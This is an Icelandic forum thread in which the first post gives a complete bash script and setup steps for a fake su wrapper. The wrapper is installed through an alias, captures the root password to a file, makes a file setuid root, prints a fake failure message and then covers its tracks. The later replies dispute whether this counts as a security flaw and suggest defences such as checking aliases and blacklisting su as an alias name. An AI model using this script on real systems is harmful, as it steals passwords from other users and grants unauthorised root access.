Phishing The Bash Shell


Höfundur
marijuana
Vélbúnaðarníðingur
Póstar: 349
Skráði sig: Fim 04. Feb 2010 15:09
Reputation: 7
Staðsetning: Seltjarnarnes
Hafðu samband:
Staða: Ótengdur

Phishing The Bash Shell

Pósturaf marijuana » Fös 06. Apr 2012 17:02

Öryggisgalli í Bash ?

Farið í skel (ÞETTA ER FYRIR SU EKKI SUDO, hægt að gera þetta með bæði en su var uppsett hjá þeim sem fann þetta !! ;) )

1. farið í skel, xterm, gnome-terminal hvað sem er.
2. verið viss um að vera í home möppunni
3. Búið til skrá sem heitir my.sh

keyrið þessa línu hér :

Kóði: Velja allt

alias su="./my.sh"

Alias dettur út ef þið lokið svo þessum terminal glugga, ekki vonast til að það sé þarna til eilífðar .. :P

4. Setjið þetta inní my.sh

#!/bin/bash

#create a couple of files - password to capture the password and exefile to become our effective root(uid) executable
touch password &> /dev/null
touch exefile &> /dev/null

echo -n "Password: "

#turn off keystroke echo
stty -echo

#read and store password in reads default variable REPLY
read

#turn echo back on
stty echo

#pass the value in REPLY to the file password and to the command su
printf "%s\n" "$REPLY" | tee password | su -c "chown root:root ./exefile; chmod 4755 ./exefile" &> /dev/null

#display the fake password failure message
sleep 1
echo
echo "su: incorrect password"

#move my.sh somewhere else
mv ./my.sh ./my.sh.bu

#create a symbolic link so that su points to the executable su
ln -s $(which su) ./my.sh

exit 0


chmod ið hana svo hún sé keyranleg ..

Kóði: Velja allt

chmod +x my.sh


svo gerið þið bara

su root

setjið inn passwordið, það kemur rangt í fyrstu tilraun, í annarri komist þið svo í root skel.

Eftir fyrstu tilraun þá er lykilorðið í skrá sem heitir password :)


Linux ain't so secure ya know ! :)




coldcut
Vaktari
Póstar: 2192
Skráði sig: Mið 21. Nóv 2007 02:25
Reputation: 0
Staðsetning: /dev/random
Staða: Ótengdur

Re: Phishing The Bash Shell

Pósturaf coldcut » Lau 07. Apr 2012 12:50

en þú þarft root/sudo til að geta gert þetta...so what's your point?




dandri
Ofur-Nörd
Póstar: 297
Skráði sig: Fim 22. Sep 2011 23:00
Reputation: 6
Staða: Ótengdur

Re: Phishing The Bash Shell

Pósturaf dandri » Lau 07. Apr 2012 17:18

Þetta telst varla sem öryggisgalli


AMD FX-4100 | ASRock 990FX Extreme3 | G.Skill Ripjaws 1600 8gb | 2x MSI Cyclone R6850 OC Version | Corsair HX750

Skjámynd

dori
Besserwisser
Póstar: 3606
Skráði sig: Fim 12. Feb 2009 10:46
Reputation: 142
Staða: Ótengdur

Re: Phishing The Bash Shell

Pósturaf dori » Lau 07. Apr 2012 18:50

Þetta er öryggisgalli, þetta er fítus. Þetta er bara bash scripta sem wrappar su og loggar lykilorðið. Þetta gæti auðvitað verið vesen ef einhver kemst í vélina þína. En það er líka hægt að setja þetta í ~/.profile til að það sé alltaf keyrt (en þá er það mjög augljóst). Það er hægt að sjá með því að skrifa `alias` hvort það sé búið að fokka eitthvað svona með bash skipunum. Svo er líka hægt að keyra `which SKIPUN` til að sjá hvaða skipun þú ert virkilega að fara að keyra.



Skjámynd

gardar
Besserwisser
Póstar: 3111
Skráði sig: Mán 11. Ágú 2008 02:49
Reputation: 12
Staðsetning: ::1
Staða: Ótengdur

Re: Phishing The Bash Shell

Pósturaf gardar » Lau 07. Apr 2012 20:58

Svo er líka alltaf hægt að gera blacklista yfir orð sem ekki má nota sem alias :)




Höfundur
marijuana
Vélbúnaðarníðingur
Póstar: 349
Skráði sig: Fim 04. Feb 2010 15:09
Reputation: 7
Staðsetning: Seltjarnarnes
Hafðu samband:
Staða: Ótengdur

Re: Phishing The Bash Shell

Pósturaf marijuana » Lau 07. Apr 2012 23:19

coldcut skrifaði:en þú þarft root/sudo til að geta gert þetta...so what's your point?


nei, þarft ekki root/superuser til að gera þetta, þetta er bara logger sem tekur passwordið í su, þarft ekki superuser til þessa !

Og með að blacklista orð sem má ekki nota sem alias gerir EKKERT gagn, getur alltaf breytt nafninu á scriptuni, ætlaru að banna öll orð í heiminum ?? :woozy



Skjámynd

gardar
Besserwisser
Póstar: 3111
Skráði sig: Mán 11. Ágú 2008 02:49
Reputation: 12
Staðsetning: ::1
Staða: Ótengdur

Re: Phishing The Bash Shell

Pósturaf gardar » Lau 07. Apr 2012 23:25

marijuana skrifaði:Og með að blacklista orð sem má ekki nota sem alias gerir EKKERT gagn, getur alltaf breytt nafninu á scriptuni, ætlaru að banna öll orð í heiminum ?? :woozy



Blacklistar su, problem solved.



Skjámynd

dori
Besserwisser
Póstar: 3606
Skráði sig: Fim 12. Feb 2009 10:46
Reputation: 142
Staða: Ótengdur

Re: Phishing The Bash Shell

Pósturaf dori » Lau 07. Apr 2012 23:36

marijuana skrifaði:
coldcut skrifaði:en þú þarft root/sudo til að geta gert þetta...so what's your point?


nei, þarft ekki root/superuser til að gera þetta, þetta er bara logger sem tekur passwordið í su, þarft ekki superuser til þessa !

Og með að blacklista orð sem má ekki nota sem alias gerir EKKERT gagn, getur alltaf breytt nafninu á scriptuni, ætlaru að banna öll orð í heiminum ?? :woozy

En þú getur bara gert þetta á þínum aðgangi í þinni skel (s.s. þú loggar þig inn og skrifar þetta og þetta dettur út eftir að skelinni er lokað). Þetta er fínt hobbí en sem "árás" er þetta 2/10. Augljóslega gætirðu sett þetta inní .profile eða .bashrc hjá einhverjum sem þú vilt stela lykilorði af en til þess þyrftirðu réttindi til að breyta þeim skrám og ef þú hefur þau eru margar mun betri aðferðir til að komast í þessar upplýsingar (gætir t.d. bara skipt út /bin/su ef þú hefur sudo réttindi).

Alias blacklisti er ekki á það sem er keyrt heldur, eins og Garðar bendir á, skipanirnar sem þú getur maskað. Þ.a.l. er hægt að banna þetta.



Skjámynd

tdog
Vaktari
Póstar: 2012
Skráði sig: Mán 06. Des 2010 17:32
Reputation: 24
Staða: Ótengdur

Re: Phishing The Bash Shell

Pósturaf tdog » Sun 08. Apr 2012 02:15

Useless ef að aðgangurinn sem þetta er gert á er ekki í sudoers skránni.



Skjámynd

dori
Besserwisser
Póstar: 3606
Skráði sig: Fim 12. Feb 2009 10:46
Reputation: 142
Staða: Ótengdur

Re: Phishing The Bash Shell

Pósturaf dori » Sun 08. Apr 2012 02:49

tdog skrifaði:Useless ef að aðgangurinn sem þetta er gert á er ekki í sudoers skránni.

Reyndar ekki beint. Ef notandinn væri á annað borð að nota su er hann að fara að skipta um notanda og þú færð lykilorðið fyrir þann notanda sem er verið að skipta yfir í. Í 99% tilfella er það root (eða eitthvað, allavega þegar ég geri það).
Reyndar virðist þetta gera ráð fyrir því að það sé bara verið að nota su til að skipta yfir í root, ég hef ekki prufað þetta og nennti ekki að lesa þetta vel yfir þannig að mér gæti skjátlast.

Hvernig sem það er þá er þetta ekki öryggisgalli því að þú þarft annaðhvort rótaraðgang á tölvu eða aðgang að skel notanda sem er að fara að breyta sér í rót með því að nota su. Svo er þetta gagnslaust ef þú blacklistar su sem aðgerð sem má búa til sem alias.